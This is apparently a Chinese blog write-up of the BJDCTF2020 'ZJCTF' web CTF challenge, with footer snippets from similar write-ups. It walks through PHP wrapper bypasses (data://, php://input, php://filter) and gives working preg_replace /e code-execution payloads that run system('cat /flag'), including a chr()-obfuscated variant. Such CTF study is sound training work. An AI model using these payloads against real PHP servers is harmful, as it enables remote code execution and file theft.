[BJDCTF2020]ZJCTF,不过如此

已于 2022-01-19 23:58:41 修改
阅读量4k 收藏 19
点赞数 8
分类专栏: CTF刷题记录 文章标签: web CTF BUU
于 2021-03-31 23:38:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/115363699
版权

[BJDCTF2020]ZJCTF,不过如此

目录

[BJDCTF2020]ZJCTF,不过如此

解题过程

1. 第一次绕过,有下面两种方法:

2.进行base64解码,得到next.php的源码

3.preg_replace()的/e模式存在命令执行漏洞

4.另一种思路

题目:

解题过程

首先,进行代码审计

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

代码中提示了next.php,并且过滤了flag,所以需要先从next.php中找找线索。

首先需要绕过对$text的过滤

if(isset($text)&&(file_get_contents($text,'r')==="I have a dream"))

1. 第一次绕过,有下面两种方法:

1.php://input

2.data://text/plain,..(注意抓包的时候,$text参数里的空格是%20)

2.进行base64解码,得到next.php的源码

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

进行一个简单的分析,我们的目的是传入$cmd参数,然后eval执行从而来拿到flag。

3.preg_replace()的/e模式存在命令执行漏洞

可参考文章:深入研究preg_replace与代码执行

上面的命令执行,相当于 eval('strtolower("\\1");') 结果,当中的 \\1 实际上就是 \1 ,而 \1 在正则表达式中有自己的含义。

这里的 \1 实际上指定的是第一个子匹配项,我们拿 ripstech 官方给的 payload 进行分析,方便大家理解。

为什么要匹配到 {${phpinfo()}} 或者 ${phpinfo()} ,才能执行 phpinfo 函数,这是一个小坑。这实际上是 PHP可变变量 的原因。在PHP中双引号包裹的字符串中可以解析变量,而单引号则不行。 ${phpinfo()} 中的 phpinfo() 会被当做变量先执行,执行后,即变成 ${1} (phpinfo()成功执行返回true)

payload:

?\S*=${getFlag()}&cmd=system('cat /flag');

4.另一种思路

这个是看L1ch师傅的博客看到的一种解法,没有用到getFlag()函数,而是直接命令执行,原文传送门:[BJDCTF2020] ZJCTF,不过如此

因为发现引号会被转义,所以用chr拼接system的参数

payload:

?\S*=${system(chr(99).chr(97).chr(116).chr(32).chr(47).chr(102).chr(108).chr(97).chr(103))}

自己还是太菜了,web之路漫漫,继续努力✊✊✊

2022-1-19更新

有个师傅问了我这个题目,我回来再看,发现之前分析的不是很到位,所以补充一下

关键的部分

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
 
function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}
 
 
foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}
 
function getFlag(){
	@eval($_GET['cmd']);
}

preg_match使用了/e模式,可以导致代码执行。当preg_match函数在匹配到符号正则的字符串时,会将替换字符串(上面的第二个参数)当作代码来执行。

实验如下:

但是本题中,第二个参数已经定为了'strtolower("\\1");',这里要注意\\1实际上就是\1,而\1有特殊的含义,\1实际上指的就是第一个子匹配项

 

所以\\1其实就是我们传进去的{${phpinfo()}},即'strtolower("\\1")'其实就是'strtolower("{${phpinfo()}}")'

但是我们为什么要传入{${phpinfo()}}呢?

${phpinfo()}中的phpinfo()会被当作变量先执行,执行后变成${1}(1是因为phpinfo()成功执行后返回true),而strtolower("{${1}}") 又相当于 strtolower("{null}")又相当于 '' 空字符串

所以关键不在于preg_match执行之后能不能返回值,而是在于preg_match的第二个参数是先被当作变量执行了,达到命令执行的效果

坑1:/e模式的php版本问题

报错:Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in...

查的资料表示/e模式在php5.5.x版本已经弃用了,但是根据我实验,在5.6.9版本下,虽然会报错,但是还能够使用这个特性

然后7.0之后的版本就不能用了,如下

参考文章:

1.深入研究preg_replace与代码执行 

2.L1ch师傅的博客

Sk1y
关注
  • 8
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
buuctf-[BJDCTF2020]ZJCTF不过如此
qq_42728977的博客
12-26 2359
[BJDCTF2020]ZJCTF不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
[BJDCTF2020]ZJCTF不过如此1
qq_48008847的博客
07-16 1766
通过分析代码,get传入两个参数text和file,text参数利用file_get_contents()函数只读形式打开,打开后内容要与"I have a dream"字符串相匹配,才能执行下面的文件包含$file参数。 看到用的是file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪协议中的data://协议用filter协议去读下next.php的源码 获取next.php的payload: index.php?text=data://text..
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace)
qq_43622442的博客
05-09 1973
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace) 1.打开网站,审计,第一个if可以用php://input 或者 data://伪协议绕过,php伪协议分析可看php伪协议: 2.然后往下,提示next.php文件,这里可以用php://filter伪协议拿到它的源码: 3.payload: http://90812d78-a226-4cdf-be8f-8baa9961fb89.node3.buuoj.cn/?text=php://input&f
[BJDCTF2020]ZJCTF不过如此 1
qq_43618536的博客
07-04 708
BUUCTF的[BJDCTF2020]ZJCTF不过如此 1
[BJDCTF2020]ZJCTF不过如此(php伪协议,data伪协议,preg_replace /e漏洞)
weixin_44110537的博客
10-04 513
伪协议常用在文件包含漏洞中. 常见的文件包含函数有: include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readfile. 具体的函数功能可以参考. 伪协议的学习 通过data协议构造 data://text/plain,I have a dream 通过php协议构造 php://filter/convert.base64-encode/resource=ne.
[BJDCTF2020]ZJCTF不过如此 -wp
freerats的博客
08-02 491
打开容器,进行代码审计 传入text和file参数,第一个可以用data伪协议绕过,然后接下来是一个文件包含,可以用php协议读取数据。 无法直接打开提示的next.php,所以用php协议读一下。 ?text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64-encode/resource=next.php 读出的源码如下 <?php $id = $_GET['id']; $_SESS.
[bjdctf2020]zjctf不过如此
最新发布
m0_62593857的博客
08-16 234
preg_replace函数中,用strtolower("\\1")替换正则表达式匹配到的字符串,正则表达式跟$re有关,而$re又是通过GET方法传的参数名称,所以可控,要匹配的$str则是参数值,所以也可控,“\\1”其实就是\1,意思是第一个子匹配项,使用/e修饰符,preg_replace会将 replacement 参数当作 PHP 代码执行。
BUUCTF [BJDCTF2020]ZJCTF不过如此(正则e模式漏洞)
qq_54929891的博客
03-06 2739
进去就是一串PHP代码,代码功能是:用GET方法传入text和file两个参数的值 (file_get_contents函数代表将名字为text的文件以只读的方式打开,并且将文件内容读入到一个字符串中),如果读入的内容是I have a dream,则会输出该字符串内容并且正则表达式来匹配file参数传入的值,若匹配失败则直接GG 这个时候我们要用到伪协议data了,它可以传递文件内容也可以执行函数(函数一般要base64),这里我们传递文件内容就行了text=data://text/plain...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值